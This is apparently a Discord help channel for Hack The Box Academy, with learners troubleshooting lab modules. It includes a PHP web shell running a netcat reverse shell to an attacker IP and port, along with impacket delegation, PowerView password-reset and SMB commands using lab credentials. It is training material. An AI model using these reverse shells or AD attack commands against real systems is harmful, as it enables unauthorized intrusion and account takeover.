#modules
just click the app
ok cool but why doesnt it work anymore? I found it easier this way. Whats up with my terminal?
also the app isnt opening for some reason
sudo apt update?
idk that 😅
yeah and upgrade
ok cool ill try
thanks bro
im getting these errors
i cant upload images here for some reason
dm it
Nobody can tell me how to connect to the HTB-Corp network?
Wdym htb-corp, what module are you working on?
Ah missed your early message
You have to connect to the target machine first
I have connected already but I can't login into HTB-Corp with the password sentinal
Connect to the WPA-Enterprise Wi-Fi network named "HTB-Corp" with username "HTB\Sentinal" and password "sentinal". Once connected, locate the flag at the IP address 192.168.3.1. I am stuck here
Weird that it's sentinal and not sentinel
that's because it's the name of an HTB staff member
But meh i haven't touched the wifi stuff
they are probably the author of the module
No it is sentinal there the password
Neat
I did the configuration file opened it but it is not connecting... can't understand what's wrong....
Their emulation is working so slow that reminds me times when maximum operative memory was about 512 Mb
Why don't you connect via GUI?
I am connecting via GUI but it asks me for password
Haven't you said you already got a pass?
I know that I have a pass but it is not working
Which module is this?
Are you using the password just above the first question: rdp to <ip> with "<username>" and password "<password>"
Wi-Fi Penetration Testing Basics
Section would be nice
If it's the SA, there might be something not allowing you to connect
Connecting to Wi-Fi Networks
This one is via wpa_supplicant and config file indeed
I did the config file and still nothing....
Config file should active it itself right?
I just ran the commands and they work fine
Make the config file with the parameters in the question and run the commands from the "Connecting to WPA Enterprise" part in sequence
on login brute forcing module should i be trying to log in as Jane Smith
ok after the config file opening what other commands I should run?
Have you set your config file with the username and password provided?
sudo wpa_supplicant -c wpa_enterprsie.conf -i wlan0
It should connect you to the wifi network
It helps if you give the module and section you're stuck on, we can't read your mind
You can't send images
ok Module 77, Section 726
ohh makes sense, I wanted to send a pic
so how do I explain?
Module name and section name on the page, i.e. Linux fundamentals - filesystem
That's not really an "exercise" as it is an example
its called "getting started"
I accidentally hit enter one sec im editing
You may not always be able to do everything
Im doing service scanning
And what are you having issues with
3rd question: List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
You're given Bob's credentials in the reading
In the format user:password
I wanted to send a picture for some reason even with steps its not working
yes it show "bob:Welcome1"
When connecting to a share, don't use -L
I didnt use it
ill send the line I started with
smbclient -U bob \\10.129.19.169\users
it got removed
the back slashes
Put a ` at the front and back of the command to avoid discord formatting
Yeah because \ is an escape character
in the code its 4 back slashes before the Ip and 2 before User
Yes
oh ok
I'm aware, but is that the available share you need to connect to?
Did you list shares before attempting to connect?
"smbclient -U bob \\10.129.19.169\users"
That's quotes
'smbclient -U bob \\10.129.19.169\users'
Not backtick (`)
Hello, on this server people help about cheat games or this is not this type of server
ill just copy you bro
Not that kind of server
Use your brain
If I have an issue with my script can I ask here?
there is game hacking though
probably not the one u looking for though
No
smbclient -U bob \\\\10.129.19.169\\users
Did you list available shares first
Oh okay thanks for the info
Where
That's a big hint for any server you join
Academy module
True jajaj
there are also challenges
yea with smbclient -N -L \\\\10.129.19.169
https://academy.hackthebox.com/course/preview/game-hacking-fundamentals
https://academy.hackthebox.com/course/preview/game-reversing--modding
This module serves as an introduction to fundamental Game Hacking concepts. You will learn how to find and change memory values in a running game as well as...
bro im trying man
And was "users" one of the available shares?
yea with no comments on it
Also you can instead do //ip/share
And what error are you getting when you try and connect
Note the password is Welcome1
when I try to capture the flag text it says no command available
That's... odd so it sounds like it connects you
yea its weird thats my only issue
What is the command you're using to try and get the flag?
everything else is good
Is the flag in a subdirectory?
Cat isn't an smb command
I can't even remember the payload I was using that was confusing me I'll just move on 😂
Try more flag.txt
oh ok
Or get flag.txt
ok ill try
get flag.txt should work
Then after you download it, exit the smb session and do cat flag.txt
I tried this it works
good job
"getting file \flag\flag.txt of size 33 as flag.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)" is my prompt
thx bro
I quit now and do this?
Yes
Just finished the SQLMap Essentials module, and got the final flag, but it won't accept it as the answer - flag looks legit. I tried logging in and out with no success. Anyone ever have a module that won't accept the found flag?
ok ill try now
see if there is no space in flag @quasi flint
no space before or after
also when u paste in the field
I even tried typing it in again
The flag can also be bugged and you are getting some weird character, does the flag look like l337sp34k?
It is leet speak
@fluid mist don't share the flag dumbass
my b brother
didnt know
Appreciate the help still
Thanks for the help anyhow. I will reach out to support I guess.
Hello everyone not really a modules question but I was wondering if any one has used the annual subscription and is the step by step question guide worth it I haven’t needed it yet? Thank you for any opinions.
It's ok to help you get unstuck or to give an alternate perspective on how to solve a problem
The authors like to rely on msfconsole/proxy for their pivoting stuff (which is interesting) but I prefer using ligolo
Appreciate it
But i wouldn't rely on the walkthrough to do much explaining beyond what was in the reading
Awesome information thank you
They had a typo in the flag, one of the leet speak words didn't look right so I flipped it from a 'a' to '0' and it worked.
Kerberos Attacks § Constrained Delegation from Linux
The ticket retrieved by :
impacket-getST -spn TERMSRV/DC01.INLANEFREIGHT.LOCAL 'INLANEFREIGHT.LOCAL/beth.richards:B3thR!ch@rd$' -impersonate Administrator
is giving me KDC_ERR_PREAUTH_FAILED when I try to use it. Why?
bad password or user?
Nope, actually it was failure to leave /etc/hosts alone. Specifying -dc-ip and -target-ip instead of editing configuration files fixed the problem.
Hi guys, I need help accessing hackthebox to do labs. I logged in and went to labs and this appears, any ideas?
See #welcome
network error
No idea since you can't post images here
issue with Debugging section of Malware Analysis:
sudo inetsim
INetSim 1.3.2 (2020-05-19) by Matthias Eckert & Thomas Hungenberg
Main logfile '/var/log/inetsim/main.log' does not exist. Trying to create it...
Error: Unable to create main logfile '/var/log/inetsim/main.log': No such file or directory.
did all the preceding steps correctly...suppose I'd have to set this up on one of my own VMs as the module seems to suggest it won't work properly on a pwnbox?
you transfer it from your machine
just download it on your machine then copy it to the rdp session
yes that can work too
i just copied and pasted it
I'm doing skills assessment for cme , i connected to the target environment using chisel client , when I'm doing anything using proxychains in the target environment I'm getting a socket error or timeout
sounds configuration related
Hello! excuse me:
for footprinting module SNMP section i get the question:
"Enumerate the custom script that is running on the system and submit its output as the answer"
i am really confused
what is it really asking us to do?
You enumerate the snmp service using the methods provided
It'll be obvious once you see it
i did :P i did the other 2 questions, but like am i supposed to put the custom script name as an answer?
submit its output
because what i understood it now is there is a custom script running aka process
and the number of processes running is soooooo big
The script had already run
Well one of the tools narrows your field of view to the important bits
right, but my understanding then is correct, it's a process that is running
Nope
It's a process/script that had already been run and logged on the server
hmmmmmmm, thing is, when you say "submit its output as the answer"
Because its output is logged
Running implies that it is currently active
i didn't know that SNMP registers logs
i thought it monitors online devices hmmmm
Yes, it monitors and logs
well, i don't quite understand what exactly it's monitoring
as i said, i lack the experience with the service
It's monitoring for activity on the device
interesting, okay thank you, but hmmmm, would that mean
SNMP is used a lot with IDS or something?
also i have a question, sometimes i see a question and i want to do something, but maybe some tool wasn't discussed, are we supposed to go online and search for such tools?
It's not often something like that happens
sure, right, but it did happen i forgot what tool i had to search for
But getting information from multiple sources is helpful
but is that an intended goal? is that considered cheating?
How would it be cheating?
well, it makes the question easier since i am using a tool that wasn't discussed
for me, it feels a bit like cheating, but am i to learn by myself?
Most of the times the tools required are what's discussed, but they aren't the only available tool for the job
so, am i encouraged to do such a thing? because i love doing that, but i end up usually contraining myself to what was discussed in a module
ppl say if we do AEN blindly, we would be considered prepared for CPTS? but what if i spend a 4-5 days doing AEN with around 10 hours per day...
constraining*
Understand where your methodology is breaking
You can constrain yourself if you want
The pivoting module doesn't go over ligolo-ng but that's been my goto for pivoting
It doesn't hurt to learn more tools if you find one that does the job better or just works better for you
excuse me @fathom pendant sometimes, the OIDs has weird random number values, what do they represent?
Utilize google
absolutely, hahahaha, sometimes i just find it better to talk with someone if i had someone
Can't be bothered to explain it
No worries! i will, thank you!
Especially since they're not necessarily random
Weird question but why does this curl PUT not work?
||curl -X PUT http://94.237.59.180:41735/api.php/city/fort_worth -d '{"city_name":"zag", "country_name":"zag"}' -H 'Content-Type: application/json'||
For context I'm trying to figure out how to refer to a city in a header obviously I cant use an empty space
The city_name stored in the table is "Fort Worth" so my assumption is that the space should be replaced with an underscore and no caps lock
Because that's not how the api works
I tested this with a city name without a space and got the expected result
This is CRUD no?
Also make sure you know how it's calling the endpoint
Are you sure it's calling it as fort_worth
If you look it up as "fort_worth" yes
I cant upload the image but it returns the JSON string
With the full name, country
Did you try with -X update?
I mean I could but that would create the entry on the assumption that the entry does not exist
but I'm specifically trying to figure out how to refer to an entry that has a space in the name
I really thought it would be an underscore and I'm struggling to figure out how to google this question
(I mean I did google it but was simply told "_")
I know I'm going to run into this issue in the future, at some point, and would love to know why this is not working when the endpoint is specifically "fort_worth'
but when used with CRUD API is not working, but will if it lacks a space character (hence me being able to modify city names like london to something else with the exact same parameters)
I must be missing the obvious here. Footprinting medium assessment lab;
I've got the solution in front of me, copied exactly the format over to pwnbox (tried both written and pasting password) but i seem to fail to reach the devshare that I need... any thoughts/help? pls
where are the recommended boxes in the end of each module ?
can someone snapshot the location ?
the only thing i see is the Academy X HTB Labs universe
can anybody tell which option is used to generate standalone payload in msfvenom?
Hello! Is this a right place to ask questions about module "ACL Abuse Tactics" (related to CAPE cert)?
yes
When I try to execute the Set-DomainUserPassword command (copied from listing no. 3 in this module), I receive the warning:
WARNING: [Set-DomainUserPassword] Unable to find user 'damundsen'.
Any idea why? I don’t see any typo or similar issue there.
For clarity, I understand what the message means, but the entire module is designed for this user. So, if he doesn't exist, I'm not entirely sure how I am supposed to complete this module and do the exercises.
what was your full command
$SecPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)
$damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
Import-Module .\PowerView.ps1
Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose
you mean the "target"?
yes
will check once again now
same with new target
"unable to find user 'damundsen'"
Since I’m new, I’d like to ask if there’s another place where I can report this?
on the modules itself there is small icon on the bottom right, there u can create a ticket
but before that I would say restart the target, and between the restart wait for 5 min
only bringing this up since you mentioned you are new: do the exercises mention this user specifically? I don't have this module to confirm. Sometimes the environment of the exercises does not match the content.
@urban elk Hi, I’m fully aware that this might sound like a newbie question, but yes, this module specifically revolves around this particular user, which is why I’m asking.
just covering the basics. Hope you get some help
If I buy a htb academy giftcard how can I activate it and can I use it to buy academy one month subscription?
have you tried prepending the domain ?
for now I'm going to the next module, I've already wasted too much time on this one
don't, clearly not
lol
that was close
ok, no more s**t posting, Thanks for help @urban elk & @storm elk
HTB won't post links to separate discords
You can use the DN or set the Domain flag
Hello can anyone tell me how to subscribe in the student plan , if I don’t have a student mail they don’t provide us with an email
Unable to find user 'INLANEFREIGHT\damundsen'
Did you use the DN or the Domain flag? You can also use Get-DomainUser in the Identity
Check if you can run Get-DomainUser damundsen separately
Then try changing to the full command
Step by step guide on how to access the Student Plan.
If you can’t find the user for whatever reason even after querying for the user only, I’d suggest restarting the env
You can also dump the users in Linux to see if there is any problem with the environment or if it’s just something with your Windows session
Yes
Your secpassword variable is wrong
You need to specify the password for the user wley
found password from previous modules but this just not work, will back to this later
what happens if im in the middle of a module and my student subscription runs out?
the module will get locked
@autumn pilot something is wrong, wmiexec.py inlanefreight.local/wley:'<here password with 4 as last character>'@172.16.5.5
result: rpc_s_access denied
I thought they were available even after
Does this happens to annual subs as well?
Not my case, since I got monthly and there are only 4 modules to unlock, but it’s always good to know
completed modules will be yours forever
if you bought them with cubes - then they are yours too
I meant if you’re in the middle of a module unlocked by annual subscription
hello
hello
hi
Information Security Foundations. And guides and tips for the information. I’m currently on Windows Command Line . Passed Linux and Windows Fundamentals but that’s because there were guides on YouTube that explained thoroughly. If anyone can get advice or tips that’ll be great.
new module
No
uh, okay
That moment when you solve the entire module and you’re just sitting there like fuck that was hard
Injection Attacks?
@acoustic owl can we attack inlanefreight.com or the lab is not fully done yet?
you may only test inlanefreight.com within the scope given to you by the module
Ah
So you can't freestyle?
In general, that's tough
no, it's a public website. can't go out of scope
Damn, it's sad it's not up for general training like XSS, SQLi but limited only by the OSINT module
i think it's better that way
Nah
I was able to dig up a report from 2022, it featured AD attacks and stuff
Like...an official HTB document
It's def used for other stuff than OSINT
yea it's probably used in AD Enum & Attacks... for looking up domain info
There
yea this is from the Documentation & Reporting module
none of this was ever actually a part of inlanefreight.com
UGGGGH, damn it could have been very fun lab
But they chose not to
😭
you already have AEN
plus making vulnerable web apps public and indexable by google isn't a good idea anyway
AEN?
it's the capstone module for the Pentester Path
Ong
They should make ultra labs or smth, sometimes it feels like the pro labs are quite small
it's bigger than that sample report you dug up.. which i'm going to delete since that's spoiling Tier II module content
Apologies, but it's open source
Yes i just finished now
I really got my ass handed to me
Web app is my weak point. Doing cbbh then oSCP july, just wanted to take a pity stop
Pitt stop*
Hey Can you help me with this problem. Questions
Answer the question(s) below to complete this Section and earn cubes!
Target(s): 10.129.197.240 (ACADEMY-NIXFUND)
Life Left: 91 minute(s)
SSH to 10.129.197.240 (ACADEMY-NIXFUND) with user "htb-student" and password "HTB_@cademy_stdnt!" I was trying to connect but to ssh . But it is not connecting. I am solving Academy Modules
Hello hello, good morning, is there any module for ethical hacking in Spanish
I believe english is encouraged... and required in my case. 🙃
What module and section are you on?
English only here, #rules number 7
Thanks
Examples won't always match what you'll do/see in output
If they did, there would be no reason to have the exercises as you could cheat your way through
I know my question is for example in linux module there was a question about the kernel version and when I did the command, copy and paste the output it didn't work
Because there's a target you need to ssh to
The pwnbox != the target
Can I do it all on the pwnbox or I've to use openvpn
You can connect to the target from the pwnbox
The pwnbox is automatically connected to your selected vpn region
Thanks for helping, I appreciate it
I always push for people to use their own vms, more control over tools installed, persistent storage, can utilize it for more than htb
I'll definitely try this, I guess it would need openvpn, right?
Yep
But vbox and vmware both have drag & drop capabilities
So you can download on your main os and drop the vpn file into your vm
More easy and better
That is good
I suggest using netexec in the future
But it's a full error, so I suggest investigating further with evil-winrm
Also deleting message bc potential spoiler
when i do evil-winrm he shows me also a error message
i think is the connection to that machine
Then restart the machine, wait a few minutes, then attack/connect
Kerberos Attacks § RBCD from Linux
impacket-rbcd -dc-ip 10.129.205.35 -t DC01 -f ATTACKER inlanefreight\\carole.holmes:Y3t4n0th3rP4ssw0rd
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
usage: rbcd.py [-h] -delegate-to DELEGATE_TO [-delegate-from DELEGATE_FROM] [-action [{read,write,remove,flush}]]
[-use-ldaps] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address]
identity
rbcd.py: error: the following arguments are required: -delegate-to
The module examples use an outdated version of impacket, so what's the updated syntax of this command?
I don't know where I have to ask it but can anyone help me in private to resolve EscapeTwo of HTB, pls ?
Update: was using a completely different rbcd.py script that I had to download; fixed now
No, there's #1327698295102898246 you'll need to read and follow #welcome to access
thanks
hi chat
how to solve this, "Use NSE and its scripts to find the flag that one of the services contain and submit it as the answer."
module : nmap scripting engine
Use scripts to enumerate the server
I suggest starting with the ones in the example first
ok bro will update if it works
The module doesn't show using this as an example, it specifically says to use rbcd.py
that said, your error shows exactly which argument is missing
I had the exact same issue yesterday in the active directory module. I had to actually type the password, copy & paste wouldn't work.
Yeah, figured that out when I downloaded the rbcd.py from GitHub.
i am on module "Getting Started", "nibbles" page
listen on my port, upload my image.php
curl the php
but i don t have the reverse bash
some one can help me ?
Did you put your tun0 ip and port in the php?
yes
<?system ("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.238 2727 /tmp/f");
system('id'); ?>
and
sudo nc -lvnp 2727
the id line don t write out
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:2727
Ncat: Listening on 0.0.0.0:2727
Ncat: Connection from 10.129.120.222:58554.
/bin/sh: 0: can't access tty; job control turned off
$
if i type some thing no return
Wdym "no return"
You may need to upgrade the shell
python3 -c 'import pty;pty.spawn("/bin/sh")'
i follow the course :
$ python -c 'import pty; pty.spawn("/bin/bash")'
but nothing print
and no prompt ($)
i can t post screen
try entering a command
hi am having issues with the vm pwnbox (hosted locally):
$ ncat -nv --source-port 53 10.129.2.28 50000
bash: ncat: command not found
i tried upgrade /installing both netcat traditional and openbsd
Isn’t it nc > /tmp/f?
What about manually
ho my......
so many time and change
loose the second ">" when i insert port .............
try saving this and btw you forgot the > before the /tmp
<?system ("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.238 2727 > /tmp/f"); ?>
thanks , reinstalled all missing packages
Change vpn regions
that didnt help killed my connection right away ill try TCP
I am very welcomed
Well yeah changing vpn regions will kill the connection...
Also make sure you only have one vpn running
I want to know if this group has people who can teach me how
I know i waited got the new file, connected to that , put my ssh in got connected ran netstat and it dropped
This isn't general, read and follow #welcome
yeah right now i only have openvpn running
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
even my pwnbox ssh is timing out
Don't run pwnbox and your own vm at the same time
didnt try to as mentioned it dropped my VM so i tried pwnbox
ill reboot my pc that fixes all the things
No one is gonna hold your hand through learning @viscid patio read the linked article
🙏🏻Can I talk to one of you in private and explain to me and ask him questions?
No
If you need help with an academy module you can ask here
Someone did the footprinting ftp page not the lab ?
Is there a way to show the flag.txt ? I got both question but i dont feel right to have tried something and got it
Can someone just tell me where to start learning hacking
Wdym show it?
I want steps?
I linked an article earlier bud
Read that
If it works then don't feel bad
Each scenario will be different, the article is a good starting point to understand. And atp I wouldn't wanna take you on even if you paid me
The only thing i see when i go on the ftp is ftpuser ftpuser there a file called flag.txt i got it but how would i have known if it werent for the question that file was there
If you can't be bothered to read an article titled "beginners bible" then you're just gonna infinitely frustrate me
ls
You can ls and dir in ftp
I did a ls -R even ls but it only show ftpuser
I didn't say you could dm me
@fathom pendant Sorry
I've given you all the basic info
And at this point you sound like a leech that's just gonna go "and then?" After being told to do something instead of doing any legwork yourself
Htb academy has plenty of learning modules, and even an intro to pentesting module
Can I speak?
Isn't just better to go for the basic paths like cracking into htb that give you things to learn to really start ?
This channel is for help with the htb academy modules
@fathom pendant my bad i was just dumb and not observant i forgot the file name is at the end
I just want the direct site that I can learn from
Mood
That's one site you can learn from
@fathom pendant Thank you very much ♥
It's not 100% free
Hey all... noob here lol
But the beginner modules (tier 0) are all free
@fathom pendant Should I open the link you sent me on Google? Or there is a private, protected site
I said maybe it should be opened in a protected location like Tor
It doesn't need to be
And Tor is useless if you're gonna be signing in to an authenticated service anyway
Are you a manager here?
No
Please don't @ me
Your account is beautiful
The important thing is that I want someone here to help me, because there is someone with a white heart who can teach me in private 🙏🏻
i doubt you'll find that here, this channel is for discussion about HTB's Academy platform, so most people are learning from that, not private tutoring
where I can ask about pwnbox time... I dont have any time left... :/
This says it's for labs, but I think it applies to academy too:
- Free Users have a single two hour session of Pwnbox available for the life of their account, as a way to test out its features. Free users also have limited internet access, with only our own target systems and GitHub being allowed.
- VIP users have a limit of 24 hours per month to use their Pwnbox. This limit gets renewed with each month that you renew your VIP Subscription
- VIP+ users have unlimited use of Pwnbox.
What is Pwnbox? How does it work? Read about it here.
hi I have been stuck on attacking SMB service section from Attacking Common Services module for several days. I got the the rpcclient part where I'm logged in but none of the commands work. This is for question 3. I already completed questions 1 and 2 so I don't need help with those.
can someone help me out here? I took a few days off because of the fires
but a few days ago I tried for like three days
can someone help me out with next step?
I know I can log in as the right user via rpcclient and I know which SMB ports are open but other smb tools don't work for logging in only the one tool
I hope I'm not spoiling anything I'm trying to be vague.
I need to know how I get the commands to work via RPC
can someone DM me?
@cloud urchin I cant use openvpn as an alternative?
you absolutely can use your own VM with openvpn, it's probably a better experience doing it that way too.
that kerberos skills assessment was about 1000% times easier than i was expecting
im confused, didnt i kinda give you the answer a few days ago?
if you can answer questions 1 and 2, 3 should be no problem at all
you found the share but didnt check it?
I think one of my brain cells dropped a packet, when it says local VM is that referring to the PWNbox or the VM i connect to via SSH? Either way those are not local
depends on the context
It is highly recommended to set up our virtual machine (VM) locally to experiment with it. Let us experiment a bit in our local VM and extend it with a few additional packages. First, let us install git by using apt.
that would be your personal VM
Ok sounds like its time to spin another one up
pwnbox already has what you need
but if you use kali or parrot the default settings should be fine
Ok just another confusing line in these trainings. It makes it sound like the practice of installing it is a good idea (which i think it is) but if its already done and I dont have to start my own VM
ok I know I think I am missing some stupid detail due to having a bad week
this week has been very stressful
"and I dont have to start my own VM" wydm by this
I mean I have had vacations kind of but a lot of evacuating and driving all over the place
OS Management Linux Fundamentals Package Management page first line below list of commands https://academy.hackthebox.com/module/18/section/72
its just showing you how to install stuff
np ill move on, I have parrot OS VM on my PC was just going to start another but not gunna spend the time trying to get mine setup if their's is already working appropriately
the tools shown are already installed by default, thats just for any future tools you want to install
ok
can I DM with someone in like an hour? I think I need to start the section over and eventually I think I will need someone to help me through the last step which is what I think I'm at
or maybe I can DM someone tomorrow night? is that possible?
Kerberoasting from Linux
What is Adam's password, a Kerberoastable account?
I am not getting Adams account
||
impacket-GetNPUsers inlanefreight.local/htb-student:'HTB_@cademy_stdnt!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Name MemberOf PasswordLastSet LastLogon UAC
----------- -------- -------------------------- -------------------------- --------
amber.smith 2023-03-30 06:40:23.135840 2025-01-17 14:42:20.567899 0x410200
jenna.smith 2022-10-14 05:00:00.581111 2025-01-17 14:42:20.739757 0x410200
carole.rose 2022-10-14 05:00:03.377990 2025-01-17 14:42:20.927255 0x410200
||
NPUsers is for asrep ig
I got the the public key to log in via ssh and I am trying to log in after importing it and it won't let me
I am trying to ssh in as the user. this is for question 3 of same module I have been on
you can't use the public key for ssh you need the private key
ok I think I have private key actually
its id_rsa
its denying permission to log in based on having too much permissions
what is the right chmod command to make this work?
do I just play around with permissions?
maybe it is private key because it says permission denied (public key)
I'm confused
I have file saved on pwnbox tho
chmod 600 for a private key
first couple results in google explain it
holy moly Using Web Proxies: ZAP Fuzzer is probably the most broken lab i've come across so far
i've had to reset it 4 times just for 2 separate services (even the flag) just to show up using the same command😭
I feel like we went through this before
No, you don't
aww shit here we go again
The big thing is it looks for group and other perms
I precisely remember telling him to put it in his notes
oh mb I always thought u needed to make them executable
If they are anything other than 0, ssh says "something isn't right"
Why does a file that gets read need to be executable?
yea mb, Idk why I was doing that 😂
marcielee will remember this
I mean I don't always remember to change the perms but when ssh says so: I quickly realize my stupidity
alert! You're a fuckin idiot lmao anyone can read and access your ssh key nerd
Hi, whats a good way to actually remember the things you learn from htb. I take notes but don't visit them (it's just as if I'm collecting notes but not returning to them). So when I have like 15 sections (and subsections within those sections) of notes, whats a good strategy/timetable to revisit the notes in a breathable manner?
Simply: dont take notes while reading, take notes after the fact
And revisit those notes
I like revisit: 1day 1 week 1 month
Make a sheet or something, I use notion automation to tell me which notes to review
And my review doesnt consist of reading the notes it consists of recreating it as much as possible
(Mainly cos my notes are mind maps)
so like read everything and take notes from memory, that does sound better tbh
is there something like that in Obsidian?
I use Obsidian
There's probably a plugin
ahh ok Ill have a look
what does notion automation do for you in this case?
Ill try find a relatable plugin
A lot of what I remember is from helping others
Also a good way to engage with stuff isn't "what is the right way," it's ruling out "why is this the wrong way"
yeah talking does help tbh. I wish I could be on the level to help people, hopefully one day
Whenever I make a note I make a page in notion which saves its date, I have a view in notion which filters for when the date today is equal to the date created + 1d/1w/1m
thats a good approach
ohh I see
Strats i learned in ap-psych 10+ years ago
oh nice, Im assuming ur from the states?
Yep
Also makes it so I only have to review notes from at most 3 days , unlike when I was doing flashcards, oh God
was just memorising a shit ton of case studies lol
😅
The benefit to explaining to yourself why the wrong answer is the wrong answer is it not only reinforces the right answer, it affirms your knowledge around the subject
This is generally more applicable around MC questions
ahh I see
But can be applied to methodology
sounds like it
Scan, find a web page -> rule out which tools to utilize
I mean everything is multiple choice if you reframe it to be
Enumerate page -> rule in which tools are a better scalpel
Also did you just describe process of elimination in a way that made me think it's something else?
Hacking is just a problem to solve, eliminate where you can to narrow in on what you should try
It's why I'll engage with someone using a wrong tool or doing something odd with a certain tool with "why?"
It allows for the building of the critical thinking aspect
Shifting from "well this is the tool I'm meant to use" to "well x framework is here and y tool is best for it"
Who’s taking cpts next week?
Shortcuts i took in web modules:
Public_ip:port == no revshell
I feel so stressed i need to be confident 🤝
Learned the hard way recently that certipy had shadow creds attack
This whole time I've been using pywhisker pkinit, where venvs are pain
Plenty of people probably taking it that aren't in the discord
Yep, understanding what you're attacking allows you to ask better questions, or formulate better Google queries
I know , but some tips might help
You get 2 attempts and feedback, take full advantage
Don't overcomplicate it, everything on the exam is in the course. And you can and will get stuck, don't let it discourage you
I have a quick question: I can't do pro labs, what do you recommend for other free labs?
Thank you for your support🤝❤️
Well can't recommend any free active labs due to spoilers and such
Theres free prolabs
But the best bet is to review the course material
Full house is full atm afaicr
I will redo the skill assessment?😍
Make sure you understand why a tool was used, what situation a tool is used in, and things of that nature
Try and tackle some of the skill assessments in a different manner than you did initially
This is a good tip🫶🏻
Make sure you know of backup plans of how to attack something just in case your go-to tool fails
Do labs already you're clearly omniscient 🤣
I like that i saw people failed because of this one
Troubleshooting tool issues sucks, even more when you're on a time crunch
👍🏻👍🏻👍🏻
Therefore: write your own tools
so you know it well enough to troubleshoot
Got top 5 😁
🔥🔥🔥
noice
I see you had some issues in #1234357888114364508 lol
man's so locked in he can see all the errors
I really like when modules have the hard af question at the end designed to make you use what you've learned cumulatively
I really hate these kinds of questions where it's just one-off knowledge that I can google
Meh
It's why I love being able to just fuck around in my cybersec classes
I just guess 90% of the answers and I'm right 98% of the time
The other 2% is either
1] i didn't read
2] i don't know
why does the privesc module suck so bad
Because you didn't eat all your veggies growing up
shits been downloading for the past 10 mins smh
Why not just git clone it?
had errors when I tried
Skill issue
😦
u can do it!
Try using --depth 1 so it doesn't clone as much of the commit history while still cloning all the wordlists. Works for me.
thanks
ghost ping 👀
Sorry, deleted reply because I had to re-read your post to see the context of it.
Working on enterprise network right now on the first pivoting chapter, having some trouble getting proxychains to work. I'm using -D 9050 so it's set to what's in proxychains.conf at default, but it doesn't follow the routes when i ping the hosts or use nmap
This is why I use ligolo
ah-
Ping and fping work just fine
It's not the fact they can't go through ports, it's the protocol in use that's the issue
Socks proxy is annoying
probably because they don't specify Pn though for some reason
Don't share screenshots of modules above tier 0
yeah just saw that
Also you should be doing the module blind if you're doing the cpts path
As everything you'll encounter will have been taught in some form in the modules preceding it
true!
Blind == spin up the target, don't even read questions
Since the module itself is a walkthrough
How do I display filtered ports in an Nmap scan? I know that my target IP has certain ports filtered (reason = no response), but when I run a -p- scan, it just won't display them and I can't find an option to make that happen.
I don't think -sn scans ports
"No response" doesn't necessarily mean filtered
Well, scanning the individual ports definitely said they were filtered, so that’s what I’m referring to.
What module and section are you working on?
Nmap - Firewall and IDS/IPS Evasion (Hard Lab)
I did finish it, but I had to lookup the forum discussion for a nudge, since the port I’m supposed to be connecting to doesn’t appear in a regular Nmap scan (nor is it specified in the challenge description)
Utilize some of the techniques, like source port
If you read the ids/ips evasion section it refers to dns
Yeah finding the technique was not the problem there
Instead of specifying the exact port [as in the example] it should show up with -p-
Except it didn’t (I tried multiple times)
Yeah and the technique specified using a specific source-port
That bit isn't mutable
It's due to common firewall misconfigurations
Also if you trip the detection system you're locked out of interacting with it anyway
It's not a t0 module iirc also sharing ss of a skill assessment is spoiling
Point is; try a -p- scan with source port
Also do a Syn Scan
Source-port btw isn't the -p option
--source-port tells nmap to use a specific port from your device instead of arbitrary one that a normal connection would do
need help for this: https://academy.hackthebox.com/module/143/section/1279 Question: 8 Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
I have the Admin of SQL01, and a password of mssql, dumped all the hashes, tried to use the password of mssql but no luck
Why is nxc so slow on ftp? I ran it in password mutations section and it sends 1 request every 5 seconds
While hydra has normal speed so it is not about vpn/internet speed
Module: Introduction to Windows Evasion Techniques
Section: Skills Assessment I
Can I DM somebody about this? kinda stuck and need some help
hey guys what's up... I'm stuck in password attacks / Network Services. Is it normal that it doesn't react to this? Yesterday I had the issue that it had a timeout in checking the password with the user names and now it shows me this.
┌──(kali㉿kali)-[~/files]
└─$ ping 10.129.146.130
PING 10.129.146.130 (10.129.146.130) 56(84) bytes of data.
64 bytes from 10.129.146.130: icmp_seq=2 ttl=127 time=67.0 ms
64 bytes from 10.129.146.130: icmp_seq=3 ttl=127 time=61.7 ms
^C
--- 10.129.146.130 ping statistics ---
3 packets transmitted, 2 received, 33.3333% packet loss, time 2021ms
rtt min/avg/max/mdev = 61.652/64.328/67.005/2.676 ms
┌──(kali㉿kali)-[~/files]
└─$ crackmapexec winrm 10.129.42.197 -u username.list -p password.list
it shows me nothing back and that's it
when I run evil-winrm it also shows me an error:
evil-winrm -i 10.129.42.197 -u john
Enter Password:
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type Errno::EHOSTUNREACH happened, message is No route to host - No route to host - connect(2) for "10.129.42.197" port 5985 (10.129.42.197:5985)
Error: Exiting with code 1
yeah, figured I'd help out with some typos while I was reading through it lol
Guys, I'm looking for a remote cybersecurity internship, can anyone help with that
@versed eagle please don't post solutions for module questions
Ok sorry, thought having it in a spoiler was ok. Where can I ask my question then? Because it's related to what's stated in the solution
?
you may ask someone to DM you
Aight, can anyone DM me related to the TE.CL lab in the HTTP Attacks module? I solved it, but I don't really understand the way it's described in the solution
Yeah you can DM.
Hi everyone,
